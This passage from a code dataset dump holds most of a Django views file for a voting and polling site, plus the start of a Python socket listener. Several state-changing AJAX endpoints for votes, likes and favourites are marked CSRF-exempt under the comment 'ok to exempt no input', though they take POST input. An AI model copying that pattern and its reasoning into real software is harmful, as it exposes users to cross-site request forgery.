polltype=poll_type).order_by('-pollmodifydate')\n cache.set('pollitems_date'+username, pt_query)\n # if users are not signed up then only restrict them to 5 entries\n\n else:\n\n #this query is for users who are not authenticated\n pt_query = PollItem.objects.filter()\n\n if sort == \"Score\":\n pt_query = pt_query.filter(allowed=True, polltype=poll_type).order_by('-score')\n # pt_query = pt_query.filter(allowed=True, polltype=poll_type).order_by('-score')[:10]\n else:\n pt_query = pt_query.filter(allowed=True, polltype=poll_type).order_by('-pollmodifydate')\n # pt_query = pt_query.filter(allowed=True, polltype=poll_type).order_by('-pollmodifydate')[:10]\n\n return pt_query\n\n\n\n\n\n def get_context_data(self, **kwargs):\n context = super(PollsListView, self).get_context_data(**kwargs)\n\n\n #check what type of request /favorite list/created list or general list\n if self.request.GET.get('favorite', None):\n context['listtitle'] = \"Favorite\"\n context['title'] = \"Favorite List\"\n\n elif self.request.GET.get('create', None):\n context['listtitle'] = \"Created\"\n context['title'] = \"Created List\"\n\n elif self.request.GET.get('createduser', None):\n context['listtitle'] = \"Createduser\"\n context['title'] = \"User Created List\"\n\n else: \n context['listtitle'] = \"All\"\n context['title'] = \"List\"\n\n\n type_id = self.get_pobject().id\n\n # for loading polltype name and description into metatag\n context['PollType_obj'] = self.get_pobject()\n\n # get request session for creation or update of a new slug\n # self.request.session[\"type_slug\"] = self.request.GET.get(\"type\")\n self.request.session[\"type_slug\"] = self.get_pobject().slug\n\n # getting the list of relevant tags/topics for the pollist\n polltype_obj = Ptype.objects.filter(id = type_id)\n tags = TagPoll.objects.filter(polltype=polltype_obj)\n context['Tags'] = tags\n\n # Check if this poll list is free for any user to access\n if Ptype.objects.get(id=type_id).freepoll == True:\n context['free'] = True\n\n\n context['BackPtype'] = self.get_pobject().slug\n\n \n\n # retrieve the time that the survey should pop up from the controltable to activate the survey at the alloted time\n surveypoptime = ControlTable.objects.get(id=1).delaypopsurvey\n context['surveypop'] = surveypoptime\n\n\n\n\n\n #only for general lists - to exclude methods for favourite and created\n if context['title'] == \"List\":\n \n # update the number of tips in the a polltype has inside analytics - for general poll list\n polltype = Ptype.objects.get(id=type_id)\n pollentryc = PollItem.objects.filter(allowed=True, polltype=polltype).count()\n saveentryc = ViewPollTypeUnique.objects.get_or_create(p_type_id=polltype.id)[0]\n saveentryc.ecount = pollentryc\n saveentryc.save()\n\n #default adding post should have time limit - If user is staff there is no time limit - for general poll list\n if self.request.user.is_staff == True:\n context[\"FullControl\"] = True\n else:\n context[\"FullControl\"] = False\n\n # check if user can post based on \"cpostdelay\" minutes after the user posted - for general poll list\n ctable = ControlTable.objects.get(id=1)\n cpostdelay = ctable.postadddelay\n user = self.request.user\n\n try:\n # search for the last time the user posted\n lpostdate = PollItem.objects.filter(user_submit=user).last().date\n\n d = datetime.utcnow()\n nowdate = pytz.utc.localize(d)\n okdate = lpostdate + timedelta(minutes=cpostdelay)\n\n if nowdate >= okdate:\n context[\"Addpost\"] = True\n else:\n timeleft = okdate - nowdate\n days, hours, minutes = timeleft.days, timeleft.seconds // 3600, timeleft.seconds // 60 % 60\n\n context[\"Hours\"] = hours\n context[\"Minutes\"] = minutes\n except:\n # if the user has not posted anything before\n context[\"Addpost\"] = True\n\n\n else:\n\n #Create a shortcut to go to general poll list that is created/favorited (not required for general list)\n context['Go'] = self.get_pobject().slug\n\n\n\n\n\n if self.request.user.is_authenticated:\n\n # to check if user should have access to the polls\n context['userauthenticated'] = True\n\n #allow premium view of each poll only if user is subscribed\n if self.request.user.puser.memberp == True:\n context[\"Subscribedp\"] = True \n\n # Check if users can update the ptype - if the user is the person who created and if the polllist is not locked then authorise\n if self.request.user == Ptype.objects.get(id=type_id).c_user or self.request.user.is_staff:\n if Ptype.objects.get(id=type_id).locked == False:\n context['user_authorised'] = True\n\n\n # retrieve the slug to redirect user to creating a new post on the slug\n context['type_slug'] = self.get_pobject().slug\n\n\n #retrieve the entries for this polltype that the users have voted for\n ptype_obj = Ptype.objects.get(id=type_id)\n user = self.request.user\n # start = time.time()\n voteposi = PollVoting.objects.filter(vote_user=user, vote=1).values_list(\"poll_id\",flat=True)\n pollposi = PollItem.objects.filter(id__in=voteposi, polltype=ptype_obj)\n votenega = PollVoting.objects.filter(vote_user=user, vote=-1).values_list(\"poll_id\",flat=True)\n pollnega = PollItem.objects.filter(id__in=votenega, polltype=ptype_obj)\n # end = time.time()\n # print(end - start)\n context['pollposi'] = pollposi\n context['pollnega'] = pollnega\n\n #not required to run for create and favourite\n #retrieve the entries that the user have favorited\n pollfav = PollFav.objects.filter(fav_user=user).values_list(\"poll\",flat=True)\n pollfavitem = PollItem.objects.filter(id__in=pollfav, polltype=ptype_obj)\n context['PollFav'] = pollfavitem\n\n\n\n # #exclude entries that have been voted down more then 10 votes\n # todisallow = PollItem.objects.filter(allowed=True, polltype=ptype_obj, score__lte=-10)\n # if todisallow:\n\n # for i in todisallow:\n # # #remove all the people who favorited the disallowed post - removed as it might be confusing and take too much time\n # # rmvfav = PollFav.objects.filter(poll=i)\n # # if rmvfav:\n # # for j in rmvfav:\n # # j.poll.remove(i)\n\n # #remove the notifications when the post is downvoted\n # rmvnoti = Notification.objects.filter(pollitem=i)\n # if rmvnoti:\n # for k in rmvnoti:\n # k.active=False\n # k.save()\n\n # #disallow the poll from showing on polllist\n # i.allowed=False\n # i.save()\n\n\n # record total number of views for the polltype on analytics table\n # only recording for users who view who is not the person who created\n if Ptype.objects.get(id=type_id).c_user != self.request.user:\n view_obj = ViewPollTypeUnique.objects.get_or_create(p_type=ptype_obj)[0]\n view_obj.userview.add(self.request.user)\n view_obj.vcount = view_obj.userview.count()\n view_obj.save()\n\n # #count the number of entries and save it - think about moving this to a post save so that it is less resource intensive\n # #issues here - get needs to be get_or_create if not there will be an get error - think and test consolidate this inside the below\n # pollentryc = PollItem.objects.filter(allowed=True, polltype=type_id).count()\n # saveentryc = ViewPollTypeUnique.objects.get(p_type_id=type_id)\n # saveentryc.ecount = pollentryc\n # saveentryc.save()\n\n\n return context\n\n\n\n\n\n###################################\n######### Poll detail #############\n###################################\n\nclass PollDetailCreate(LoginRequiredMixin, CreateView):\n model = PollItem\n form_class = PollItemAddForm\n success_url = '/polls/'\n template_name = 'polls/polls_create.html'\n\n\n def dispatch(self, *args, **kwargs):\n dispatch = super(PollDetailCreate, self).dispatch(*args, **kwargs)\n type_id = self.request.session.get(\"type_id\")\n\n #redirect user if he is banned\n if self.request.user.is_authenticated:\n user = self.request.user\n userban = PUser.objects.get(user=user)\n if userban.banned == True:\n messages.info(self.request, \"You have been banned from posting, please contact us if you need help\")\n return redirect('/')\n\n\n # #exit if no poll_id\n # print (self.request.session.get(\"type_slug\"))\n\n if self.request.session.get(\"type_slug\") == None:\n messages.info(self.request, \"Please choose a poll to create a new entry for\")\n return redirect('Home')\n return dispatch\n\n\n def get_polltype(self, *args, **kwargs):\n type_slug = self.request.POST.get(\"type_slug\")\n # del self.request.session[\"type_id\"]\n polltype = get_object_or_404(Ptype, slug=type_slug) \n obj = polltype\n return obj\n\n def get_context_data(self, **kwargs):\n context = super(PollDetailCreate, self).get_context_data(**kwargs)\n #replaced with the below to get the right slug when add new tip is added\n # type_slug = self.request.session.get(\"type_slug\")\n type_slug = self.request.GET.get('type_slug')\n context['type_slug'] = type_slug\n pollobj = get_object_or_404(Ptype, slug=type_slug)\n context['title'] = pollobj\n\n return context\n\n def form_valid(self, form):\n\n # print (dir(self.object))\n # print (dir(self.object.id))\n # print (self.object.id)\n\n i = form.save(commit=False)\n i.user_submit_id = self.request.user.id\n i.polltype = self.get_polltype()\n i.allowed = False\n\n # i.title = form.cleaned_data.get(\"title\")\n # i.description = form.cleaned_data.get(\"description\")\n # i.image = form.cleaned_data.get(\"image\")\n i.save()\n\n valid_data = super(PollDetailCreate, self).form_valid(form)\n return valid_data\n\n def get_success_url(self):\n # del self.request.session[\"type_id\"]\n # url = \"/polls/?type=\" + str(self.get_polltype().slug)\n # messages.info(self.request, \"Your entry has been posted\")\n\n # New - with preview\n # poll_id = self.request.session.get(\"poll_id\")\n\n pk = self.object.id\n url = reverse('polls_detail_preview', kwargs={'pk': pk})\n\n return url\n\n\n\n\n\nclass PollDetailUpdate(LoginRequiredMixin, UpdateView): #if user is request user or staff can change\n model = PollItem\n form_class = PollItemEditForm\n template_name = 'polls/polls_update.html'\n\n def dispatch(self, *args, **kwargs):\n dispatch = super(PollDetailUpdate, self).dispatch(*args, **kwargs)\n # print (self.request.session.items())\n\n #exit if no poll_id\n if self.request.session.get(\"poll_id\") == None:\n messages.info(self.request, \"Please choose a poll to update\")\n return redirect('Home')\n\n #exit if user did not create poll and is not a staff\n if not (self.object.user_submit == self.request.user) and not (self.request.user.is_staff):\n return redirect('Home')\n\n return dispatch\n\n def get_context_data(self, **kwargs):\n context = super(PollDetailUpdate, self).get_context_data(**kwargs)\n # pollobj = get_object_or_404(Ptype, slug=type_slug)\n #save the session id so this submission is directed to the right preview\n self.request.session[\"poll_id\"] = self.get_object().id\n context['title'] = self.object.title\n\n # messages.info(self.request, \"Please note that once you update you will lose comments and points for this entry\")\n return context\n\n def form_valid(self, form):\n\n my_date = datetime.now(pytz.timezone('Singapore'))\n poll_obj = self.object\n poll_obj.pollmodifydate = my_date\n poll_obj.save()\n\n # user = self.request.user\n # form.instance.user = user\n\n # if (self.object.title == form.instance.title) and (self.object.description == form.instance.description) and (self.object.image == form.instance.image) and (self.object.imageurl == form.instance.imageurl):\n # pass\n # else:\n # print (\"run clean function - lose comments and points for this entry\")\n\n # print (self.object.title)\n # print (self.object.description)\n # print (self.object.image)\n # print (self.object.imageurl)\n\n # print (form.instance.title)\n # print (form.instance.description)\n # print (form.instance.image)\n # print (form.instance.imageurl)\n\n valid_data = super(PollDetailUpdate, self).form_valid(form)\n return valid_data\n\n def get_success_url(self):\n # Original - no preview\n # poll_id = self.request.session.get(\"poll_id\")\n # pk = poll_id\n # url = reverse('polls_detail', kwargs={'pk': pk})\n # messages.info(self.request, \"Your entry has been updated.\")\n\n # New - with preview\n poll_id = self.request.session.get(\"poll_id\")\n pk = poll_id\n url = reverse('polls_detail_preview', kwargs={'pk': pk})\n return url\n\n\n\nclass PollDetailPreview(LoginRequiredMixin, TemplateView):\n template_name = 'polls/polls_detail_preview.html'\n\n\n def dispatch(self, *args, **kwargs):\n dispatch = super(PollDetailPreview, self).dispatch(*args, **kwargs)\n PollItem_id = self.kwargs.get('pk')\n Poll = PollItem.objects.get(pk=PollItem_id)\n\n #exit if user did not create poll and is not a staff\n if not (Poll.user_submit == self.request.user) and not (self.request.user.is_staff):\n return redirect('Home')\n\n return dispatch\n\n def get_context_data(self, **kwargs):\n context = super(PollDetailPreview, self).get_context_data(**kwargs)\n pollobj_id = self.kwargs.get('pk')\n pollobj = PollItem.objects.get(pk=pollobj_id)\n ptypeobj = pollobj.polltype\n\n context['poll'] = pollobj\n context['pt'] = ptypeobj\n context['Back'] = pollobj_id\n\n return context\n\n def post(self, request, *args, **kwargs):\n pollobj_id = self.kwargs.get('pk')\n\n if request.method == 'POST':\n\n #when user confirms the post will be published \n if request.POST.get('pub_poll_id') is not None:\n poll_id_pub = request.POST.get('pub_poll_id')\n\n pitem_obj = PollItem.objects.get(pk=pollobj_id)\n pitem_obj.allowed = True\n pitem_obj.save()\n\n # #update the number of tips in the a polltype has inside analytics\n ptypeobj = pitem_obj.polltype\n\n #notifications to update users - originally time was used to alert users\n # d = datetime.utcnow()\n # nowdate = pytz.utc.localize(d)\n # publishdate = pitem_obj.date + timedelta(minutes=1)\n\n #extracting users who favorited the poll under polllist\n pitemreq = PollItem.objects.filter(polltype=ptypeobj)\n userlist0 = PollFav.objects.filter(poll__in=pitemreq).values_list('fav_user',flat=True).distinct()\n\n #extracting users who favorited the tag for the polllist for the poll\n userlist1 = TagPoll.objects.filter(polltype=ptypeobj).values_list('tagfav',flat=True)\n\n # set is for distinct list, chain is for combining querysets into a list\n result_list = list(set(chain(userlist0, userlist1)))\n userlist = User.objects.filter(id__in=result_list)\n\n\n if not Notification.objects.filter(pollitem=pitem_obj, action=\"New Tip\"):\n # create new tip because new tip for this item does not currently exist\n #message to the user\n message = str(pitem_obj)\n\n action = \"New Tip\"\n\n for i in userlist:\n notify.send(sender=self.request.user,\n recipient=i,\n polltype=ptypeobj,\n pollitem=pitem_obj,\n tagpoll=None,\n pollreview=None,\n action=action,\n message=message\n )\n\n\n messages.info(self.request, \"Your post has been published\")\n\n return HttpResponseRedirect(reverse('polls_detail', kwargs={'pk': pollobj_id}))\n\n\n\n\n\n\n\n\n\n# AdminPollsListView\n\ndef AdminPollsListView(request):\n pslug = request.GET.get('type') \n ptype_obj = Ptype.objects.filter(slug=pslug)\n polllist = PollItem.objects.filter(polltype=ptype_obj).order_by('-date')\n\n context = {\n 'polls': polllist, \n }\n \n return render(request, 'polls/admin_poll_list.html', context)\n\n\n\n\n\n\n# class PollDetailDelete(LoginRequiredMixin,UpdateView): #if user is request user or staff can change\n# model = PollItem\n# form_class = PollItemDeleteForm\n# template_name = 'polls/polls_disallow.html'\n\n# def dispatch(self, *args, **kwargs):\n# dispatch = super(PollDetailDelete, self).dispatch(*args, **kwargs)\n\n# if self.request.session.get(\"poll_id\") == None:\n# messages.info(self.request, \"Please choose a poll to delete\")\n# return redirect('Home')\n\n# return dispatch\n\n# # def get_context_data(self, **kwargs):\n# # context = super(PollDetailDelete, self).get_context_data(**kwargs)\n# # poll_id = self.request.session.get(\"poll_id\")\n# # context['poll_id'] = poll_id\n# # return context\n\n# def form_valid(self, form):\n# self.object.allowed = False\n# self.object.save()\n# valid_data = super(PollDetailDelete, self).form_valid(form)\n# return valid_data\n\n# def get_success_url(self):\n# # url = \"/\"\n# type_slug = self.request.session.get(\"type_slug\")\n# url = \"/polls/?type=\" + str(type_slug)\n# messages.info(self.request, \"Your entry has been deleted.\")\n# return url\n\n\n\n\n\n\n\n\n\nclass PollDetailView(LoginRequiredMixin, DetailView, FormView):\n model = PollItem\n context_object_name = 'poll'\n template_name = \"polls/polls_detail.html\"\n form_class = PollItemMessageAddForm\n second_form_class = PollItemMessageUpdateForm\n\n\n def dispatch(self, *args, **kwargs):\n dispatch = super(PollDetailView, self).dispatch(*args, **kwargs)\n if self.get_object().allowed != True:\n messages.info(self.request, \"This is item is no longer available\")\n return redirect('Home')\n\n # send the user to premium subscribe if the user wants to access details unless he is member or he created this entry\n try:\n if (self.object.user_submit != self.request.user) and (self.request.user.puser.memberp == False) and (self.object.polltype.freepoll != True):\n messages.info(self.request, \"Please subscribe to the premium package plan to access details\")\n return redirect('SelectPlan')\n except:\n pass\n\n return dispatch\n\n\n def get_context_data(self, *args, **kwargs):\n\n context = super(PollDetailView, self).get_context_data(**kwargs)\n context['listtitle'] = \"Detail\"\n\n\n if self.request.user.is_authenticated:\n\n\n obj = self.get_object()\n msgobj = Message.objects.filter(senduser=self.request.user, pollitem=obj).first()\n\n # Check if this ptype is free\n if obj.polltype.freepoll == True:\n context['free'] = True\n\n # backward to the polltype from the poll tip\n context['BackPtype'] = obj.polltype.slug\n\n # if msgobj:\n # INITIAL_DATA = {'content': msgobj.content}\n\n # two form classes are created one for update and one for create comments\n if msgobj:\n context['form'] = self.second_form_class(request=self.request, initial={'content': msgobj.content})\n else:\n context['form'] = self.form_class(request=self.request)\n \n\n context[\"user\"] = PUser.objects.get(user=self.request.user)\n\n pollitem_obj = PollItem.objects.get(id=self.object.id)\n # is it favorited by current user? \n # context[\"Submit\"] = \"Favorite\"\n # if PollFav.objects.filter(fav_user=self.request.user, poll=pollitem_obj):\n # context[\"Submit\"] = \"Unfavorite\"\n\n if self.object.user_submit != self.request.user:\n view_obj = ViewPollItemsUnique.objects.get_or_create(p_item=self.object)[0]\n view_obj.userview.add(self.request.user)\n view_obj.vcount = view_obj.userview.count()\n view_obj.save()\n\n\n\n # getting the number of views\n try:\n view_obj = ViewPollItemsUnique.objects.get(p_item=self.object)\n context['Views'] = view_obj.vcount\n except:\n pass\n\n\n # getting the number of favorites\n try:\n fav_obj = PollFav.objects.filter(poll=self.object)\n context['Favorited'] = fav_obj.count()\n\n except:\n pass\n\n\n ## getting the analytics\n # try:\n # todate = datetime.now(tzinfo=pytz.UTC)\n # # todate = datetime.datetime.now()\n # fromdate = todate - timedelta(days=365)\n\n # # context['Analytics'] = ScorePollItemsByMonth.objects.filter(p_item=self.object, updated__gte=fromdate, updated__lte=todate)\n\n # # sort the querydata by id\n # df = ScorePollItemsByMonth.objects.filter(p_item=self.object, updated__range=[fromdate, todate]).order_by('id')\n\n # df = df.values_list('year','month','posi','nega', flat=False)\n # #inserting the collected data into a dateframe for manipulation\n # df = pd.DataFrame(list(df))\n # #giving the dataframe column names\n # df.columns = ['year','month','posi','nega']\n # #concatenate the period\n # df[\"period\"] = df[\"year\"].map(str) + \"-\" + df[\"month\"]\n # #reverse the negative sign\n # df[\"nega\"] = df[\"nega\"]*-1\n # df = df[['period','posi','nega']]\n # #changing column names\n # df.rename(columns={'posi':'Upvotes','nega':'Downvotes'}, inplace=True)\n # #adding the header to a list format\n # dfcolumn = [df.columns.values.tolist()]\n # #adding the values to a list format\n # df = df.values.tolist()\n # #adding both together\n # df = dfcolumn + df\n\n # context[\"datav\"] = json.dumps(df)\n\n # except:\n # pass\n\n\n\n\n\n # get user details\n context['Userdetail'] = PUser.objects.get(user=self.object.user_submit).get_absolute_url()\n\n # getting the poll messages related to this pollitem\n\n sort = self.request.GET.get('sort', None)\n poll_type = self.request.GET.get('type', None)\n\n\n if sort == \"Date\":\n context[\"msg\"] = Message.objects.filter(pollitem=self.get_object()).order_by('updated')\n else:\n context[\"msg\"] = Message.objects.filter(pollitem=self.get_object()).order_by('-likes')\n \n\n # saving the poll id for updates and adding\n self.request.session[\"poll_id\"] = self.get_object().id\n\n\n if self.request.user.is_authenticated:\n\n #check if the user is the creator of the poll if so offer the option to update\n if (self.request.user == self.get_object().user_submit) or (self.request.user.is_staff):\n context['user_authorised'] = True\n\n if self.request.user.is_staff == True:\n context['user_staff'] = True\n\n\n if PollFav.objects.filter(fav_user=self.request.user, poll=self.get_object()).exists():\n context['favorited'] = True\n else:\n context['favorited'] = False\n\n\n user = self.request.user\n msglike = Message.objects.filter(userlikes=user,pollitem=self.get_object())\n context['msglike'] = msglike\n\n\n #allow basic view of each poll only of user is subscribed\n # if self.request.user.puser.member == True:\n # context[\"Subscribed\"] = True\n\n #allow premium view of each poll only of user is subscribed\n if self.request.user.puser.memberp == True:\n context[\"Subscribedp\"] = True \n\n\n return context\n\n\n\n\n def form_valid(self, form):\n\n Msgobj = Message.objects.get_or_create(senduser=self.request.user, pollitem=self.get_object())[0]\n #clear all likes\n Msgobj.userlikes.clear()\n #reset all likes in model\n Msgobj.calc_likes()\n\n Msgobj.content = form.cleaned_data.get(\"content\")\n Msgobj.save()\n\n #retrieving the pollitem\n rcontent = Message.objects.get(id=Msgobj.id).content\n #retrieving the pollitem\n pitemreq = Message.objects.get(id=Msgobj.id).pollitem\n #retrieving the user who submitted the poll\n user_submit = pitemreq.user_submit\n #inserting the message into notifications\n message = str(rcontent)\n\n\n # check if new is already existing\n try:\n existing_new = Notification.objects.get(pollitem=pitemreq, action=\"New Review\", recipient=user_submit, sender=self.request.user)\n\n except:\n existing_new = None\n\n # check if updated is already existing\n try:\n existing_updated = Notification.objects.get(pollitem=pitemreq, action=\"Updated Review\", recipient=user_submit, sender=self.request.user)\n\n except:\n existing_updated = None\n\n\n #updated notifications\n if existing_new:\n # if a review exist already change it to updated review and read = false\n existing_new.action = \"Updated Review\"\n existing_new.read = False\n existing_new.message = message\n existing_new.save()\n\n elif existing_updated:\n # if a review is already updated then just change read = false\n existing_updated.read = False\n existing_updated.message = message\n existing_updated.save()\n\n else:\n # if reviews do not currently exist for the user to the user created then just create a new review\n action = \"New Review\"\n\n notify.send(sender=self.request.user,\n recipient=user_submit,\n polltype=None,\n pollitem=pitemreq,\n tagpoll=None,\n pollreview=None,\n action=action,\n message=message\n )\n\n valid_data = super(PollDetailView, self).form_valid(form)\n return valid_data\n\n\n def form_invalid(self, form, **kwargs):\n\n #refresh the context?\n\n return render(self.request, self.template_name, {'errors': form.errors, 'form':form})\n\n\n def get_success_url(self):\n# url = \"/polls/\" + self.slug\n url = \"/polls/\" + str(self.get_object().id)\n messages.info(self.request, \"Your comment has been posted\")\n return url\n\n\n\n\n\n\n\n\n\n\n\n# def submit_poll(request):\n\n# if request.POST:\n# order_by = request.POST.get('order_by', '-score')\n# polltype = request.POST.get('poll_type')\n# title = request.POST.get('poll_title')\n# # image = request.POST.get('image', None)\n# try:\n# image = request.FILES['image']\n# except KeyError:\n# image = None\n# description = request.POST.get('poll_description')\n# PollItem.objects.create(title=title,\n# image=image,\n# description=description,\n# user_submit=request.user,\n# polltype_id=int(polltype))\n# return redirect(\"/polls/?sent=true&type=\" + polltype + \"&order_by=\" + order_by)\n# else:\n# return redirect(\"/\")\n\n\n\n\n\n\n# this us using a form to so that data is send to the back end to check for xxs/sql injection\nfrom django import forms\n\nclass reportForm(forms.Form):\n poll_id = forms.IntegerField()\n issue_id = forms.CharField()\n issuemsg = forms.CharField()\n\n\n\n\n# reporting a poll does not remove the poll - it emails the admin and admin will decide to remove the poll\ndef api_report(request):\n\n if request.POST:\n\n if request.user.is_authenticated:\n\n form = reportForm(request.POST)\n\n if form.is_valid():\n\n #redirect user if he is banned\n user = request.user\n userban = PUser.objects.get(user=user)\n if userban.banned == True:\n messages.info(request, \"You have been banned from posting, please contact us if you need help\")\n return redirect('/')\n\n pollid = form.cleaned_data.get('poll_id')\n issueid = form.cleaned_data.get('issue_id')\n issuemsg = form.cleaned_data.get('issuemsg')\n\n result = pollid\n\n\n # gathering email form data for emailing to myself\n subject = \"Voterable Report Form\"\n\n if settings.TYPE == \"base\":\n from_email = settings.EMAIL_HOST_USER\n else:\n from_email = settings.DEFAULT_FROM_EMAIL\n\n try:\n form_email = request.user.email\n to_email = [from_email, form_email] # [from_email, 'jumper23sierra@yahoo.com']\n except:\n form_email = None\n to_email = [from_email] # [from_email, 'jumper23sierra@yahoo.com']\n\n contact_message = \"Poll item \" + str(pollid) + \" has been reported for \" + issueid + \" by user \" + str(request.user.id)\n\n\n #updating the report database with the issue the request has\n try:\n if (request.user.puser.alt_email is not None) and (request.user.puser.alt_email != \"\"):\n useremail = request.user.puser.alt_email\n elif (request.user.puser.email is not None) and (request.user.puser.email != \"\"):\n useremail = request.user.puser.email\n elif (request.user.email is not None) and (request.user.email != \"\"):\n useremail = request.user.email\n else:\n useremail = \"Anonymous\"\n except:\n useremail = \"Anonymous\"\n\n pollobj = get_object_or_404(PollItem, id=pollid)\n\n #user cannot vote for a post that he has created\n if pollobj.user_submit == user:\n return redirect('/')\n else:\n pass\n\n # if the user has reported already then just get and replace the latest issue in the database\n # We save the issuemsg model field only if we don't get 'true' from our frontend\n preport = PostReport.objects.get_or_create(p_item=pollobj, Puser=request.user)[0]\n\n \n if issuemsg != 'true':\n preport.postissuemsg = issuemsg\n preport.usercon = useremail\n preport.postissue = issueid\n preport.save()\n\n\n # original email send without async\n send_mail(\n subject=subject,\n message=\"Poll item \" + str(pollid) + \" has been reported for issue \" + issueid,\n html_message=contact_message,\n from_email=from_email,\n recipient_list=to_email,\n fail_silently=False\n )\n\n # # emailing the report to myself so I can make a decision to hide/disallow the poll as admin\n # async_report_mail.delay(\n # subject=subject,\n # contact_message=contact_message,\n # from_email=from_email,\n # to_email=to_email\n # )\n \n return JsonResponse({\"result\": result })\n\n else:\n return redirect('/')\n\n\n\n\n\n#counting the number of views when a poll has when dropdown is clicked on\n@csrf_exempt # ok to exempt no input\ndef api_vcount(request):\n\n if request.POST:\n if request.user.is_authenticated:\n poll_id = request.POST.get('poll_id')\n\n pobj = PollItem.objects.get(id=poll_id)\n\n if pobj.user_submit != request.user:\n view_obj = ViewPollItemsUnique.objects.get_or_create(p_item=pobj)[0]\n view_obj.userview.add(request.user)\n view_obj.vcount = view_obj.userview.count()\n view_obj.save()\n\n result = \"success\"\n\n return JsonResponse({\"result\": result})\n else:\n return JsonResponse({\"result\": \"error\", \"msg\": \"login_requred\"})\n else:\n return redirect('/')\n\n\n\n\n@csrf_exempt # ok to exempt no input\ndef api_like(request):\n # msg_id = request.POST.get('msg_id')\n\n if request.POST:\n if request.user.is_authenticated:\n\n msg_id = request.POST.get('msg_id')\n # poll_id = request.POST.get('poll_id')\n # pollitem_obj = PollItem.objects.get(id=poll_id)\n\n # exit if the user who liked it is the same as the user who posted the message\n poll_submit_user = Message.objects.get(id=msg_id).senduser\n if poll_submit_user == request.user:\n return redirect('/')\n\n\n msg_obj = Message.objects.filter(id=msg_id, userlikes=request.user)\n\n if msg_obj:\n # remove like\n msg_obj.first().userlikes.remove(request.user)\n result = \"unliked\"\n else:\n # add like\n like = Message.objects.get(id=msg_id)\n like.userlikes.add(request.user)\n result = \"liked\"\n\n try:\n msg = Message.objects.get(id=msg_id)\n msg.calc_likes()\n likecount = msg.likes\n except:\n likecount = 0\n\n # return JsonResponse({\"result\": result})\n return JsonResponse({\"result\": result, \"resultc\": likecount })\n else:\n return JsonResponse({\"result\": \"error\", \"msg\": \"login_requred\"})\n else:\n return redirect('/')\n\n\n\n\n@csrf_exempt # ok to exempt no input\ndef api_fav(request):\n\n if request.POST:\n if request.user.is_authenticated:\n poll_id = request.POST.get('poll_id')\n pollitem_obj = PollItem.objects.get(id=poll_id)\n poll_fav = PollFav.objects.filter(poll=pollitem_obj, fav_user=request.user)\n\n if poll_fav:\n # remove favorite\n poll_fav.first().poll.remove(pollitem_obj)\n result = \"unfavorited\"\n # messages.info(request, \"Unfavorited!\")\n\n else:\n # add favorite\n fav = PollFav.objects.get_or_create(fav_user=request.user)[0]\n fav.save()\n fav.poll.add(pollitem_obj)\n result = \"favorited\"\n # messages.info(request, \"Favorited!\")\n\n return JsonResponse({\"result\": result})\n else:\n return JsonResponse({\"result\": \"error\", \"msg\": \"login_requred\"})\n else:\n return redirect('/')\n\n\n# this is no longer being used\n# add poll to favorite:\ndef favorite_poll(request, pk):\n pollitem_obj = PollItem.objects.get(id=pk)\n poll_fav = PollFav.objects.filter(poll=pollitem_obj, fav_user=request.user)\n\n if poll_fav:\n # remove favorite\n poll_fav.first().poll.remove(pollitem_obj)\n messages.info(request, \"Unfavorited!\")\n\n else:\n # add favorite\n fav = PollFav.objects.get_or_create(fav_user=request.user)[0]\n fav.save()\n fav.poll.add(pollitem_obj)\n messages.info(request, \"Favorited!\")\n\n favorite = request.POST.get(\"favorite\", None)\n if favorite:\n return redirect('/polls/favorite_list/?favorite=' + favorite)\n else:\n return redirect('/polls/' + str(pk))\n\n\n@csrf_exempt # ok to exempt no input\ndef api_votes(request):\n\n if request.POST:\n\n if request.user.is_authenticated:\n\n # #if no longer the same year implement this in the new year to close off the year\n # todateyear = datetime.today().year\n # type_id = request.session.get(\"type_id\")\n # pollyear = get_object_or_404(Ptype, id=type_id).year\n # if str(todateyear) != str(pollyear):\n # messages.info(request, \"The voting for this poll has ended\")\n\n #redirect user if he is banned\n user = request.user\n userban = PUser.objects.get(user=user)\n if userban.banned == True:\n messages.info(request, \"You have been banned from posting, please contact us if you need help\")\n return redirect('/')\n\n poll_id = request.POST.get('poll_id')\n poll = PollItem.objects.get(id=poll_id)\n\n if poll.user_submit == user:\n #user cannot vote for a post that he has created\n return redirect('/')\n else:\n pass\n\n #updating the vote count for the poll\n vote_obj = PollVoting.objects.get_or_create(vote_user=request.user, poll=poll)[0]\n\n if request.POST.get('posi') == \"true\":\n if vote_obj.vote == 1:\n vote_obj.vote = 0\n else:\n vote_obj.vote = 1\n\n if request.POST.get('nega') == \"true\":\n if vote_obj.vote == -1:\n vote_obj.vote = 0\n else:\n vote_obj.vote = -1\n\n #exclude poll entries that have been voted down more the number of votes stipulated in the database\n print (poll.score)\n\n #check the number of downvotes a poll should get before removal\n ctable = ControlTable.objects.get(id=1)\n rmvotesno = ctable.removepostdvotes\n\n #poll disallowed or removed\n if poll.score <= -rmvotesno:\n poll.allowed=False\n poll.save()\n\n #remove the notifications (if any) for the poll after it had been removed\n rmvnoti = Notification.objects.filter(pollitem=poll)\n if rmvnoti:\n for k in rmvnoti:\n k.active=False\n k.save()\n\n\n\n vote_obj.save()\n\n #refresh the score of the poll in the database\n poll.calc_score()\n\n #include the below if you need to vote numbers back to the user\n return JsonResponse({\"result\": poll.score, \"resultvote\": vote_obj.vote, \"pvote\": poll.posi})\n # return JsonResponse({\"result\": poll.score})\n\n else:\n return JsonResponse({\"result\": \"error\", \"msg\": \"login_requred\"})\n else:\n return redirect('/')\n\n\n\n\n\n\n","sub_path":"test/src/polls/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":69112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"374750614","text":"import socket\nimport threading\nimport os\nimport logging\nfrom receiver import Receiver\nfrom config import Config\n\nclass Connector(threading.Thread):\n socket_listen = None\n non_stop = True\n def __init__(self):\n threading.Thread.__init__(self)\n self.logger = logging.getLogger(__name__)\n if Connector.socket_listen is None:\n conf = Config()\n port = conf.config_directory[\"PORT\"]\n try:\n self.listen = socket.socket()\n self.listen.bind((\"0.0.0.0\",int(os.environ.get('PORT',port))))\n except socket.error:\n self.logger.error(\"CREATE ERROR. MAYBE PORT IN USE. WILL EXIT.\")\n exit()\n self.logger.info(\"build success!\")\n else:\n self.listen = Connector.socket_listen\n\n def run(self):\n self.listen.listen(15)\n while Connector.non_stop:\n c, addr = self.listen.accept()\n receiver = Receiver(self.listen,c,addr)\n 